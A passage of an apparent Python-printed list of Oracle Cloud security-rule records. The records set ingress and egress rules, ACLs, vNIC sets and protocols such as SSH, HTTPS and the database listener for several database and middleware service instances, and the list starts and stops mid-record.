'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db', 'dstVnicSet': None,
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_p2_http',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_p2_http',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/http'], 'enabledFlag': False},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_p2_dbconsole',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_p2_dbconsole',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/dbconsole'], 'enabledFlag': False},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_p2otd_ahttps',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_p2otd_ahttps',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ahttps'], 'enabledFlag': False},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_wls2db_dbport',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_wls2db_dbport',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_ms',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db', 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/dbport'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_sys_ms2db_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_sys_ms2db_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_ms',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db', 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/ora_otd2ms_chttps',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/ora_otd2ms_chttps',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_acl_default',
'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_ms',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/chttps'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_ms_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_ms_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_acl_default',
'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_ms', 'dstVnicSet': None,
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_ms_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_ms_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_acl_default',
'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_ms',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_ms',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_p2otd_ahttps',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_p2otd_ahttps',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ahttps'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_admin_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_admin_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_acl_default',
'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_admin',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_admin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_p2ms_chttps',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_p2ms_chttps',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_ms',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/chttps'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_sys_ms2db_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_sys_ms2db_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_ms',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db', 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/sys_wls2otd_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/sys_wls2otd_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_wls_infraadmin',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd_infraadmin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/ora_otd2ms_chttps',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/ora_otd2ms_chttps',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_ms',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/chttps'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd_infraadmin_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd_infraadmin_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd_infraadmin',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd_infraadmin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_p2_dbexpress',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_p2_dbexpress',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/dbexpress'], 'enabledFlag': False},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_trusted_hosts_dblistener',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_trusted_hosts_dblistener',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db',
'srcIpAddressPrefixSets': [
'/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_trusted_hosts_dblistener'],
'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/dblistener'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/sys_infra2wls_admin_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/sys_infra2wls_admin_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_wls_infraadmin',
'srcIpAddressPrefixSets': ['/oracle/public/paas-infra'], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/ora_otd2ms_chttp',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/ora_otd2ms_chttp',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_ms',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/chttp'], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db',
'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db', 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_p2_http',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_p2_http',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/http'], 'enabledFlag': False},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_p2_httpssl',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_p2_httpssl',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/httpssl'], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_p2_dbconsole',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_p2_dbconsole',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/dbconsole'], 'enabledFlag': False},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/sys_infra2db_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/sys_infra2db_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db',
'srcIpAddressPrefixSets': ['/oracle/public/paas-infra'], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_acl_default', 'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd', 'dstVnicSet': None,
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd_infraadmin_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd_infraadmin_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_acl_default', 'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd_infraadmin',
'dstVnicSet': None, 'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_p2otd_chttps',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_p2otd_chttps',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/chttps'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_admin_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_admin_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_acl_default', 'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_admin', 'dstVnicSet': None,
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_p2_httpssl',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_p2_httpssl',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/httpssl'], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_p2_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_p2_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_p2_dbconsole',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_p2_dbconsole',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/dbconsole'], 'enabledFlag': False},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db',
'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db', 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_trusted_hosts_dblistener',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_trusted_hosts_dblistener',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db',
'srcIpAddressPrefixSets': [
